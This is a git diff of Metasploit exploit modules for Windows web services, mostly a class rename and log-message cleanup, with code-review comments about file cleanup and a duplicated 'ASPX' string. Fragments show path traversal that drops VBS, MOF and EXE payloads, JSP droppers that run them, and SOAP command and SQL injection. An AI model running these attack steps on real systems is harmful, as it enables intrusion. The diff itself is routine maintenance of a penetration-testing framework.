"file":"#{jsp_name}.jsp"}/ + print_status("#{peer} - Payload uploaded successfully") + else + fail_with(Failure::Unknown, "#{peer} - Payload upload failed") + end + + print_status("#{peer} - Executing payload...") + send_request_cgi({ + 'uri' => normalize_uri(datastore['TARGETURI'], jsp_full_name), + 'method' => 'GET' + }) + handler + end +end diff --git a/modules/exploits/windows/http/novell_imanager_upload.rb b/modules/exploits/windows/http/novell_imanager_upload.rb index 466ddbbae6..465490a72b 100644 --- a/modules/exploits/windows/http/novell_imanager_upload.rb +++ b/modules/exploits/windows/http/novell_imanager_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/novell_mdm_lfi.rb b/modules/exploits/windows/http/novell_mdm_lfi.rb index af793df59f..aee9177369 100644 --- a/modules/exploits/windows/http/novell_mdm_lfi.rb +++ b/modules/exploits/windows/http/novell_mdm_lfi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote def check v = get_version - print_status("#{peer} - Detected version: #{v || 'Unknown'}") + print_status("Detected version: #{v || 'Unknown'}") if v.nil? return Exploit::CheckCode::Unknown 
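Review bot: Nothing in the new netgear_nms_rce.rb removes what it writes to the tested host. It includes only `HttpClient` and `EXE`, never calls `register_files_for_cleanup`, and the JSP built in `generate_jsp_payload` leaves the `File.createTempFile` executable on disk. Other modules touched by this commit register their uploads for cleanup. Where the upload directory is not known, the operator should at least be told after a successful upload, e.g. `print_warning("#{jsp_full_name} and the dropped EXE are not removed automatically; manual cleanup will be required")`. The three `print_status` calls in `exploit` also still carry `#{peer} - `, which this commit strips everywhere else, so they should read like `print_status("Uploading payload...")`.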
@@ -133,19 +133,19 @@ class Metasploit3 < Msf::Exploit::Remote def exploit() begin - print_status("#{peer} - Checking application version...") + print_status("Checking application version...") v = get_version if v.nil? - print_error("#{peer} - Unable to detect version, abort!") + print_error("Unable to detect version, abort!") return end - print_good("#{peer} - Found Version #{v}") - print_status("#{peer} - Setting up poisoned session") + print_good("Found Version #{v}") + print_status("Setting up poisoned session") session_id,cmd = setup_session() - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") fname = upload_shell(session_id,cmd) - print_status("#{peer} - Executing payload") + print_status("Executing payload") exec_shell(session_id,cmd,fname) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout diff --git a/modules/exploits/windows/http/novell_messenger_acceptlang.rb b/modules/exploits/windows/http/novell_messenger_acceptlang.rb index d52305bdb8..0f80454e8c 100644 --- a/modules/exploits/windows/http/novell_messenger_acceptlang.rb +++ b/modules/exploits/windows/http/novell_messenger_acceptlang.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/nowsms.rb b/modules/exploits/windows/http/nowsms.rb index 05f4c9ecb3..5bbf6d1524 100644 --- a/modules/exploits/windows/http/nowsms.rb +++ b/modules/exploits/windows/http/nowsms.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/oracle9i_xdb_pass.rb b/modules/exploits/windows/http/oracle9i_xdb_pass.rb index 06b563e0cf..c59eeaa693 100644 --- a/modules/exploits/windows/http/oracle9i_xdb_pass.rb 
+++ b/modules/exploits/windows/http/oracle9i_xdb_pass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/oracle_beehive_evaluation.rb b/modules/exploits/windows/http/oracle_beehive_evaluation.rb index 19dbbe04ce..0bb82f0dd7 100644 --- a/modules/exploits/windows/http/oracle_beehive_evaluation.rb +++ b/modules/exploits/windows/http/oracle_beehive_evaluation.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb b/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb index 12a2318607..de558a196a 100644 --- a/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb +++ b/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/oracle_btm_writetofile.rb b/modules/exploits/windows/http/oracle_btm_writetofile.rb index c9abd7bfad..81a88ca3d0 100644 --- a/modules/exploits/windows/http/oracle_btm_writetofile.rb +++ b/modules/exploits/windows/http/oracle_btm_writetofile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
@@ -135,7 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote end traversal << "WINDOWS\\system32\\#{@var_vbs_name}.vbs" - print_status("#{peer} - Uploading the VBS payload") + print_status("Uploading the VBS payload") soap_request = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" " soap_request << "xmlns:int=\"http://schemas.amberpoint.com/flashtunnel/interfaces\" " @@ -163,9 +163,9 @@ class Metasploit3 < Msf::Exploit::Remote }, 5) if res and res.code == 200 and res.body =~ /writeToFileResponse/ - print_status("#{peer} - VBS payload successfully uploaded") + print_status("VBS payload successfully uploaded") else - print_error("#{peer} - Failed to upload the VBS payload") + print_error("Failed to upload the VBS payload") return end @@ -191,7 +191,7 @@ class Metasploit3 < Msf::Exploit::Remote soap_request << " </soapenv:Body>" soap_request << "</soapenv:Envelope>" - print_status("#{peer} - Uploading the MOF file") + print_status("Uploading the MOF file") res = send_request_cgi( { @@ -204,9 +204,9 @@ class Metasploit3 < Msf::Exploit::Remote }, 5) if res and res.code == 200 and res.body =~ /writeToFileResponse/ - print_status("#{peer} - MOF file successfully uploaded") + print_status("MOF file successfully uploaded") else - print_error("#{peer} - Failed to upload the MOF file") + print_error("Failed to upload the MOF file") return end @@ -221,7 +221,7 @@ class Metasploit3 < Msf::Exploit::Remote end traversal << "\\server\\examples\\build\\mainWebApp\\#{@jsp_name}.jsp" - print_status("#{peer} - Uploading the JSP payload") + print_status("Uploading the JSP payload") soap_request = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" " soap_request << "xmlns:int=\"http://schemas.amberpoint.com/flashtunnel/interfaces\" " 
@@ -249,13 +249,13 @@ class Metasploit3 < Msf::Exploit::Remote }, 5) if res and res.code == 200 and res.body =~ /writeToFileResponse/ - print_status("#{peer} - JSP payload successfully uploaded") + print_status("JSP payload successfully uploaded") else - print_error("#{peer} - Failed to upload the JSP payload") + print_error("Failed to upload the JSP payload") return end - print_status("#{peer} - Executing the uploaded JSP #{@jsp_name}.jsp ...") + print_status("Executing the uploaded JSP #{@jsp_name}.jsp ...") res = send_request_cgi( { 'uri' => "/#{@jsp_name}.jsp", diff --git a/modules/exploits/windows/http/oracle_endeca_exec.rb b/modules/exploits/windows/http/oracle_endeca_exec.rb index fd94612b71..a48a151838 100644 --- a/modules/exploits/windows/http/oracle_endeca_exec.rb +++ b/modules/exploits/windows/http/oracle_endeca_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -100,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote version = version_match[1] end - vprint_status("#{peer} - Version found: Oracle Endeca Server #{version}") + vprint_status("Version found: Oracle Endeca Server #{version}") if version =~ /7\.4\.0/ and version <= "7.4.0.787" return Exploit::CheckCode::Appears @@ -131,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote # Windows 2008 Command Prompt Max Length is 8191 fail_with(Failure::BadConfig, "#{peer} - The selected payload is too long to execute through powershell in one command") end - print_status("#{peer} - Exploiting through Powershell...") + print_status("Exploiting through Powershell...") execute_command(command) end diff --git a/modules/exploits/windows/http/oracle_event_processing_upload.rb b/modules/exploits/windows/http/oracle_event_processing_upload.rb index 3a580df1fb..054f5b890e 100644 
--- a/modules/exploits/windows/http/oracle_event_processing_upload.rb +++ b/modules/exploits/windows/http/oracle_event_processing_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -86,22 +86,22 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Generating payload and mof file...") + print_status("Generating payload and mof file...") mof_name = "#{rand_text_alpha(rand(5)+5)}.mof" exe_name = "#{rand_text_alpha(rand(5)+5)}.exe" exe_content = generate_payload_exe mof_content = generate_mof(mof_name, exe_name) - print_status("#{peer} - Uploading the exe payload #{exe_name}...") + print_status("Uploading the exe payload #{exe_name}...") exe_traversal = "#{traversal}WINDOWS/system32/#{exe_name}" res = upload(exe_traversal, exe_content) unless res && res.code == 200 && res.body.blank? - print_error("#{peer} - Unexpected answer, trying anyway...") + print_error("Unexpected answer, trying anyway...") end register_file_for_cleanup(exe_name) - print_status("#{peer} - Uploading the MOF file #{mof_name}") + print_status("Uploading the MOF file #{mof_name}") mof_traversal = "#{traversal}WINDOWS/system32/wbem/mof/#{mof_name}" upload(mof_traversal, mof_content) register_file_for_cleanup("wbem/mof/good/#{mof_name}") diff --git a/modules/exploits/windows/http/osb_uname_jlist.rb b/modules/exploits/windows/http/osb_uname_jlist.rb index e8f3f218c1..25b9326857 100644 --- a/modules/exploits/windows/http/osb_uname_jlist.rb +++ b/modules/exploits/windows/http/osb_uname_jlist.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/windows/http/peercast_url.rb b/modules/exploits/windows/http/peercast_url.rb index 6d1632f045..d8e514ffab 100644 
--- a/modules/exploits/windows/http/peercast_url.rb +++ b/modules/exploits/windows/http/peercast_url.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/php_apache_request_headers_bof.rb b/modules/exploits/windows/http/php_apache_request_headers_bof.rb index 4b7e9feccf..04e9ee1427 100644 --- a/modules/exploits/windows/http/php_apache_request_headers_bof.rb +++ b/modules/exploits/windows/http/php_apache_request_headers_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/privatewire_gateway.rb b/modules/exploits/windows/http/privatewire_gateway.rb index 3671981570..2ad78064a3 100644 --- a/modules/exploits/windows/http/privatewire_gateway.rb +++ b/modules/exploits/windows/http/privatewire_gateway.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/psoproxy91_overflow.rb b/modules/exploits/windows/http/psoproxy91_overflow.rb index 9c50701f47..f387140d39 100644 --- a/modules/exploits/windows/http/psoproxy91_overflow.rb +++ b/modules/exploits/windows/http/psoproxy91_overflow.rb @@ -5,7 +5,7 @@ -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/rabidhamster_r4_log.rb b/modules/exploits/windows/http/rabidhamster_r4_log.rb index d63fe48e99..a4a1a1f186 100644 --- a/modules/exploits/windows/http/rabidhamster_r4_log.rb +++ b/modules/exploits/windows/http/rabidhamster_r4_log.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/rejetto_hfs_exec.rb b/modules/exploits/windows/http/rejetto_hfs_exec.rb index 7c24bcaf8f..cce2a993c1 100644 --- a/modules/exploits/windows/http/rejetto_hfs_exec.rb +++ b/modules/exploits/windows/http/rejetto_hfs_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote end def on_request_uri(cli, req) - print_status("#{peer} - Payload request received: #{req.uri}") + print_status("Payload request received: #{req.uri}") exe = generate_payload_exe vbs = Msf::Util::EXE.to_exe_vbs(exe) send_response(cli, vbs, {'Content-Type' => 'application/octet-stream'}) diff --git a/modules/exploits/windows/http/sambar6_search_results.rb b/modules/exploits/windows/http/sambar6_search_results.rb index e4b0a0e1ed..060403088e 100644 --- a/modules/exploits/windows/http/sambar6_search_results.rb +++ b/modules/exploits/windows/http/sambar6_search_results.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb index 0ef0bb0f34..1b37036b59 100644 --- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb +++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit +class MetasploitModule < Msf::Exploit Rank = GreatRanking include Msf::Exploit::Remote::HttpClient 
diff --git a/modules/exploits/windows/http/sap_host_control_cmd_exec.rb b/modules/exploits/windows/http/sap_host_control_cmd_exec.rb index ee531318fd..3ba0407e99 100644 --- a/modules/exploits/windows/http/sap_host_control_cmd_exec.rb +++ b/modules/exploits/windows/http/sap_host_control_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient @@ -381,7 +381,7 @@ class Metasploit3 < Msf::Exploit::Remote </SOAP-ENV:Envelope> eos - print_status("#{peer} - Testing command injection...") + print_status("Testing command injection...") res = send_request_cgi({ 'uri' => '/', @@ -453,7 +453,7 @@ class Metasploit3 < Msf::Exploit::Remote </SOAP-ENV:Envelope> eos - print_status("#{peer} - Injecting system commands...") + print_status("Injecting system commands...") res = send_request_cgi({ 'uri' => '/', @@ -466,9 +466,9 @@ class Metasploit3 < Msf::Exploit::Remote }, 10) if (res and res.code == 500 and res.body =~ /Generic error/) - print_good("#{peer} - System command successfully injected") + print_good("System command successfully injected") else - print_error("#{peer} - Failed to inject system command") + print_error("Failed to inject system command") return end @@ -505,7 +505,7 @@ class Metasploit3 < Msf::Exploit::Remote </SOAP-ENV:Envelope> eos - print_status("#{peer} - Executing injected command") + print_status("Executing injected command") res = send_request_cgi({ 'uri' => '/', @@ -518,7 +518,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 1) if res - print_error("#{peer} - Failed to execute injected command") + print_error("Failed to execute injected command") return end diff --git a/modules/exploits/windows/http/sapdb_webtools.rb b/modules/exploits/windows/http/sapdb_webtools.rb index 67ed566e16..7456fd6022 100644 --- a/modules/exploits/windows/http/sapdb_webtools.rb +++ b/modules/exploits/windows/http/sapdb_webtools.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /SAP-Internet-SapDb-Server\// ] } diff --git a/modules/exploits/windows/http/savant_31_overflow.rb b/modules/exploits/windows/http/savant_31_overflow.rb index bf44556edd..e21b096884 100644 --- a/modules/exploits/windows/http/savant_31_overflow.rb +++ b/modules/exploits/windows/http/savant_31_overflow.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Savant\/3\.1/ ] } diff --git a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb index a61073ba6b..49b4f3ed2b 100644 --- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb +++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper @@ -63,7 +63,7 @@ class Metasploit4 < Msf::Exploit::Remote meterp = Rex::Text.rand_text_alpha(10) jsp = Rex::Text.rand_text_alpha(10) - print_status("#{peer} - Getting cookie...") + print_status("Getting cookie...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), @@ -89,7 +89,7 @@ class Metasploit4 < Msf::Exploit::Remote <%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %> } - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), 'method' => 'POST', 
@@ -110,7 +110,7 @@ class Metasploit4 < Msf::Exploit::Remote register_file_for_cleanup("../tomcat/webapps/ROOT/#{meterp}.exe") - print_status("#{peer} - Uploading JSP page to execute the payload...") + print_status("Uploading JSP page to execute the payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), 'method' => 'POST', @@ -131,7 +131,7 @@ class Metasploit4 < Msf::Exploit::Remote register_file_for_cleanup("../tomcat/webapps/ROOT/#{jsp}.jsp") - print_status("#{peer} - Executing payload. Manual cleanup will be required.") + print_status("Executing payload. Manual cleanup will be required.") send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp") }, 5) diff --git a/modules/exploits/windows/http/servu_session_cookie.rb b/modules/exploits/windows/http/servu_session_cookie.rb index c4a78a8faa..5384e6cef6 100644 --- a/modules/exploits/windows/http/servu_session_cookie.rb +++ b/modules/exploits/windows/http/servu_session_cookie.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/shoutcast_format.rb b/modules/exploits/windows/http/shoutcast_format.rb index aeb11ebc39..b95de3b057 100644 --- a/modules/exploits/windows/http/shoutcast_format.rb +++ b/modules/exploits/windows/http/shoutcast_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/shttpd_post.rb b/modules/exploits/windows/http/shttpd_post.rb index f3dbbe7725..5255a61775 100644 --- a/modules/exploits/windows/http/shttpd_post.rb +++ b/modules/exploits/windows/http/shttpd_post.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb b/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb index 5ba781def4..f484664718 100644 --- a/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb +++ b/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb b/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb index ff35263e44..2df31f7ccf 100644 --- a/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb +++ b/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb index 5bd2bfab84..053b40eec4 100644 --- a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb +++ b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote php_fname = Rex::Text.rand_text_alpha(5) + ".php" rnd_txt = Rex::Text.rand_text_alpha_upper(3) - print_status("#{peer} - Sending SQL injection...") + print_status("Sending SQL injection...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path), 'method' => 'POST', 
@@ -88,10 +88,10 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.body !~ /No Results Found/ - print_error("#{peer} - I don't think the SQL Injection attempt worked") + print_error("I don't think the SQL Injection attempt worked") return elsif not res - print_error("#{peer} - No response from the server") + print_error("No response from the server") return end @@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_status(res.to_s) target_path = "#{File.dirname(target_uri.path)}/#{php_fname}" - print_status("#{peer} - Requesting: #{target_path}") + print_status("Requesting: #{target_path}") send_request_raw({'uri' => normalize_uri(target_path)}) handler diff --git a/modules/exploits/windows/http/steamcast_useragent.rb b/modules/exploits/windows/http/steamcast_useragent.rb index 930a01332d..650dd5f3e5 100644 --- a/modules/exploits/windows/http/steamcast_useragent.rb +++ b/modules/exploits/windows/http/steamcast_useragent.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/sws_connection_bof.rb b/modules/exploits/windows/http/sws_connection_bof.rb index e8bfdbb437..c84081854b 100644 --- a/modules/exploits/windows/http/sws_connection_bof.rb +++ b/modules/exploits/windows/http/sws_connection_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking HttpFingerprint = { :pattern => [ /PMSoftware-SWS/ ] } diff --git a/modules/exploits/windows/http/sybase_easerver.rb b/modules/exploits/windows/http/sybase_easerver.rb index e25b6b7075..8be77137c6 100644 --- a/modules/exploits/windows/http/sybase_easerver.rb +++ b/modules/exploits/windows/http/sybase_easerver.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/sysax_create_folder.rb b/modules/exploits/windows/http/sysax_create_folder.rb index d770ad3532..b043198646 100644 --- a/modules/exploits/windows/http/sysax_create_folder.rb +++ b/modules/exploits/windows/http/sysax_create_folder.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/trackercam_phparg_overflow.rb b/modules/exploits/windows/http/trackercam_phparg_overflow.rb index 627868613f..f431fd9289 100644 --- a/modules/exploits/windows/http/trackercam_phparg_overflow.rb +++ b/modules/exploits/windows/http/trackercam_phparg_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/trackit_file_upload.rb b/modules/exploits/windows/http/trackit_file_upload.rb index da07199b52..c4cc9ee2fd 100644 --- a/modules/exploits/windows/http/trackit_file_upload.rb +++ b/modules/exploits/windows/http/trackit_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -499,7 +499,7 @@ class Metasploit3 < Msf::Exploit::Remote # sleep a few seconds, sometimes the service takes a while to write to disk sleep(datastore['SLEEP']) - print_status("#{peer} - Executing payload") + print_status("Executing payload") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], "Installers", filename), 'method' => 'GET' 
@@ -507,7 +507,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.code == 500 - print_error("#{peer} - Got HTTP 500, trying again with " + (@version == 9 ? "ASPX" : "ASPX")) + print_error("Got HTTP 500, trying again with " + (@version == 9 ? "ASPX" : "ASPX")) # try again but now use ASPX instead of ASP or vice-versa if @version == 9 file_content = Msf::Util::EXE.to_exe_aspx(exe) @@ -521,7 +521,7 @@ class Metasploit3 < Msf::Exploit::Remote # sleep a few seconds, sometimes the service takes a while to write to disk sleep(datastore['SLEEP']) - print_status("#{peer} - Executing payload") + print_status("Executing payload") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], "Installers", filename), 'method' => 'GET' diff --git a/modules/exploits/windows/http/trendmicro_officescan.rb b/modules/exploits/windows/http/trendmicro_officescan.rb index c9482fdcf8..0b1dcff49f 100644 --- a/modules/exploits/windows/http/trendmicro_officescan.rb +++ b/modules/exploits/windows/http/trendmicro_officescan.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'metasm' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ultraminihttp_bof.rb b/modules/exploits/windows/http/ultraminihttp_bof.rb index ac5841b53a..1100d1b113 100644 --- a/modules/exploits/windows/http/ultraminihttp_bof.rb +++ b/modules/exploits/windows/http/ultraminihttp_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/umbraco_upload_aspx.rb b/modules/exploits/windows/http/umbraco_upload_aspx.rb index 490f35f88d..8cb9460f71 100644 --- a/modules/exploits/windows/http/umbraco_upload_aspx.rb +++ b/modules/exploits/windows/http/umbraco_upload_aspx.rb 
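Review bot: The ternary in the HTTP 500 message of the `@@ -507,7` hunk, `(@version == 9 ? "ASPX" : "ASPX")`, yields the same string on both branches, so the log always says ASPX even though the comment under it says the retry switches between ASP and ASPX. Since the `if @version == 9` branch that follows calls `to_exe_aspx`, the other side was presumably meant to be `"ASP"`, i.e. `(@version == 9 ? "ASPX" : "ASP")`. The else branch and the rest of the method are outside the hunk, so confirm against them before changing the string.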
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote begin aspx = @upload_random + '.aspx' - print_status("#{peer} - Searching: #{aspx}") + print_status("Searching: #{aspx}") files = cli.fs.file.search("\\", aspx) if not files or files.empty? print_error("Unable to find #{aspx}. Please manually remove it.") @@ -79,10 +79,10 @@ class Metasploit3 < Msf::Exploit::Remote end files.each { |f| - print_warning("#{peer} - Deleting: #{f['path'] + "\\" + f['name']}") + print_warning("Deleting: #{f['path'] + "\\" + f['name']}") cli.fs.file.rm(f['path'] + "\\" + f['name']) } - print_good("#{peer} - #{aspx} deleted") + print_good("#{aspx} deleted") rescue ::Exception => e print_error("Unable to delete #{aspx}: #{e.message}") end @@ -121,8 +121,8 @@ class Metasploit3 < Msf::Exploit::Remote # attack_url = uri_path + "webservices/codeEditorSave.asmx" - print_status("#{peer} - Uploading #{aspx.length} bytes through #{attack_url}...") - print_status("#{peer} - Uploading to #{uri_path}#{@upload_random}.aspx") + print_status("Uploading #{aspx.length} bytes through #{attack_url}...") + print_status("Uploading to #{uri_path}#{@upload_random}.aspx") res = send_request_cgi({ 'uri' => attack_url, 
